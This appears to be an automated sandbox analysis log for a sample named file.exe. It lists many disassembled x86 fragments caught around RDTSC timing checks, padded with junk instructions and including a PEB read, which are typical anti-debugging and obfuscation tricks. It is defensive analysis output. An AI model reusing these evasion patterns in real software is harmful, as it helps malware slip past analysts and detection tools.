Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260242 second address: 7260278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F70F0BCDB15h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260278 second address: 726027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726027F second address: 72602B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F70F0BCDB0Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72602B1 second address: 7260325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 11FF5532h 0x00000008 pushfd 0x00000009 jmp 00007F70F070E5D3h 0x0000000e sub ax, 972Eh 0x00000013 jmp 00007F70F070E5D9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov di, 448Eh 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CFh 0x0000002a sbb ah, 0000003Eh 0x0000002d jmp 00007F70F070E5D9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260325 second address: 726032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726032B second address: 726032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726032F second address: 7260333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260333 second address: 7260370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F70F070E5CBh 0x00000010 adc si, 2F4Eh 0x00000015 jmp 00007F70F070E5D9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260370 second address: 7260376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260376 second address: 726039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov edx, 1B2C73E0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F70F070E5D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726039A second address: 72603AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72603AC second address: 72603B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72603B0 second address: 72603F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB18h 0x00000017 jmp 00007F70F0BCDB15h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72603F4 second address: 7260409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov cx, EDFBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260409 second address: 726040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726040D second address: 7260411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260411 second address: 7260417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726044C second address: 7260487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260487 second address: 7260496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260496 second address: 72604BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72604BC second address: 72604C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72604C1 second address: 72604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72604C7 second address: 7260538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F715F29CCE0h 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB0Bh 0x00000017 adc ah, FFFFFFBEh 0x0000001a jmp 00007F70F0BCDB19h 0x0000001f popfd 0x00000020 popad 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F70F0BCDB13h 0x0000002c add ah, FFFFFFCEh 0x0000002f jmp 00007F70F0BCDB19h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260538 second address: 7260589 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 sbb esi, 48A67048h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F70F070E5D6h 0x0000001e add ax, B2A8h 0x00000023 jmp 00007F70F070E5CBh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260589 second address: 72605DC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F0BCDB18h 0x00000008 adc eax, 55E9A508h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi], edi 0x00000019 jmp 00007F70F0BCDB16h 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bl, 9Bh 0x00000026 push eax 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72605DC second address: 72605EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72605EE second address: 7260687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f call 00007F70F0BCDB14h 0x00000014 mov ah, DDh 0x00000016 pop edi 0x00000017 mov cl, 67h 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F70F0BCDB0Fh 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 mov cl, 7Ah 0x00000028 pushfd 0x00000029 jmp 00007F70F0BCDB11h 0x0000002e xor ecx, 63D022F6h 0x00000034 jmp 00007F70F0BCDB11h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F70F0BCDB0Eh 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 pushad 0x00000047 mov cx, F0ADh 0x0000004b push ecx 0x0000004c mov ax, bx 0x0000004f pop edi 0x00000050 popad 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260687 second address: 726069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726069F second address: 72606F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F70F0BCDB0Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Ch 0x0000001d xor si, 7338h 0x00000022 jmp 00007F70F0BCDB0Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72606F1 second address: 726075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 mov cl, 7Bh 0x00000015 popad 0x00000016 mov dword ptr [esi+1Ch], eax 0x00000019 pushad 0x0000001a call 00007F70F070E5D7h 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 push ebx 0x00000024 call 00007F70F070E5D0h 0x00000029 pop eax 0x0000002a pop edx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+5Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726075F second address: 7260764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260764 second address: 7260777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+20h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260777 second address: 726077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726077B second address: 726077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726077F second address: 7260785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260785 second address: 726079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726079F second address: 72607CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ecx, 0E49C8C7h 0x00000017 popad 0x00000018 mov dword ptr [esi+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72607CA second address: 7260866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+64h] 0x0000000f pushad 0x00000010 mov cl, dh 0x00000012 jmp 00007F70F070E5D6h 0x00000017 popad 0x00000018 mov dword ptr [esi+28h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [ebx+68h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CEh 0x0000002a or ch, 00000068h 0x0000002d jmp 00007F70F070E5CBh 0x00000032 popfd 0x00000033 jmp 00007F70F070E5D8h 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c jmp 00007F70F070E5D0h 0x00000041 mov ax, word ptr [ebx+6Ch] 0x00000045 pushad 0x00000046 mov ah, bh 0x00000048 popad 0x00000049 mov word ptr [esi+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260866 second address: 726086C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726086C second address: 7260872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260872 second address: 7260876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260876 second address: 726087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726087A second address: 726089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 mov word ptr [esi+32h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726089B second address: 72608AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260973 second address: 72609E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 sub cx, 79BEh 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popfd 0x00000014 mov ah, 9Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F70F0BCDB14h 0x00000024 sbb cx, 29E8h 0x00000029 jmp 00007F70F0BCDB0Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72609E0 second address: 72609E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72609E6 second address: 72609EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72609EA second address: 72609EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72609EE second address: 7260A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F70F0BCDB0Ah 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70F0BCDB17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260A1D second address: 7260ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F70F070E5CEh 0x00000011 nop 0x00000012 pushad 0x00000013 movzx esi, bx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F70F070E5D4h 0x0000001d sub ax, 9368h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D5h 0x00000033 xor ch, FFFFFF86h 0x00000036 jmp 00007F70F070E5D1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F70F070E5D0h 0x00000042 and al, 00000028h 0x00000045 jmp 00007F70F070E5CBh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F70F070E5D0h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260B37 second address: 7260B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260B3C second address: 7260B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260B42 second address: 7260BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F715F29C67Fh 0x0000000e pushad 0x0000000f jmp 00007F70F0BCDB13h 0x00000014 mov di, ax 0x00000017 popad 0x00000018 mov eax, dword ptr [ebp-0Ch] 0x0000001b jmp 00007F70F0BCDB12h 0x00000020 mov dword ptr [esi+04h], eax 0x00000023 jmp 00007F70F0BCDB10h 0x00000028 lea eax, dword ptr [ebx+78h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F70F0BCDB0Eh 0x00000032 and ah, 00000068h 0x00000035 jmp 00007F70F0BCDB0Bh 0x0000003a popfd 0x0000003b push eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e pop ebx 0x0000003f popad 0x00000040 push 00000001h 0x00000042 pushad 0x00000043 mov ax, CAF3h 0x00000047 mov cx, 234Fh 0x0000004b popad 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260BCA second address: 7260BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260BCE second address: 7260BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260BE5 second address: 7260C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov di, 246Eh 0x00000011 popad 0x00000012 nop 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F070E5CBh 0x0000001a xor ax, 851Eh 0x0000001f jmp 00007F70F070E5D9h 0x00000024 popfd 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F70F070E5D8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260C56 second address: 7260CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F70F0BCDB17h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 and ecx, 7B09BE16h 0x0000001e jmp 00007F70F0BCDB11h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F70F0BCDB11h 0x0000002b nop 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F70F0BCDB0Ch 0x00000033 and esi, 5F233968h 0x00000039 jmp 00007F70F0BCDB0Bh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 call 00007F70F0BCDB16h 0x00000046 pop eax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D18 second address: 7260D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D2A second address: 7260D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D2E second address: 7260D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D3E second address: 7260D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D42 second address: 7260D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D46 second address: 7260D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D4C second address: 7260DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f popad 0x00000010 js 00007F715EDDCF1Dh 0x00000016 jmp 00007F70F070E5CDh 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e jmp 00007F70F070E5CEh 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007F70F070E5D0h 0x0000002b lea eax, dword ptr [ebx+70h] 0x0000002e pushad 0x0000002f mov cx, 091Dh 0x00000033 mov si, 1A19h 0x00000037 popad 0x00000038 push 00000001h 0x0000003a jmp 00007F70F070E5D4h 0x0000003f nop 0x00000040 jmp 00007F70F070E5D0h 0x00000045 push eax 0x00000046 pushad 0x00000047 mov bh, 0Ch 0x00000049 popad 0x0000004a nop 0x0000004b pushad 0x0000004c jmp 00007F70F070E5D2h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 pop edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260DEA second address: 7260E43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F0BCDB0Ch 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 nop 0x00000014 jmp 00007F70F0BCDB0Eh 0x00000019 push eax 0x0000001a jmp 00007F70F0BCDB0Bh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F70F0BCDB15h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260E87 second address: 7260EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F70F070E5D3h 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260EBE second address: 7260EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F715F29C2DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 1Bh 0x00000014 jmp 00007F70F0BCDB14h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260EF7 second address: 7260F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 409C21B4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e pushad 0x0000000f movzx esi, di 0x00000012 push ebx 0x00000013 mov ebx, ecx 0x00000015 pop esi 0x00000016 popad 0x00000017 mov ecx, esi 0x00000019 pushad 0x0000001a push edx 0x0000001b mov cx, 7C67h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F70F070E5CDh 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esi+0Ch], eax 0x00000030 pushad 0x00000031 pushad 0x00000032 mov edx, eax 0x00000034 mov ecx, 4850B39Dh 0x00000039 popad 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
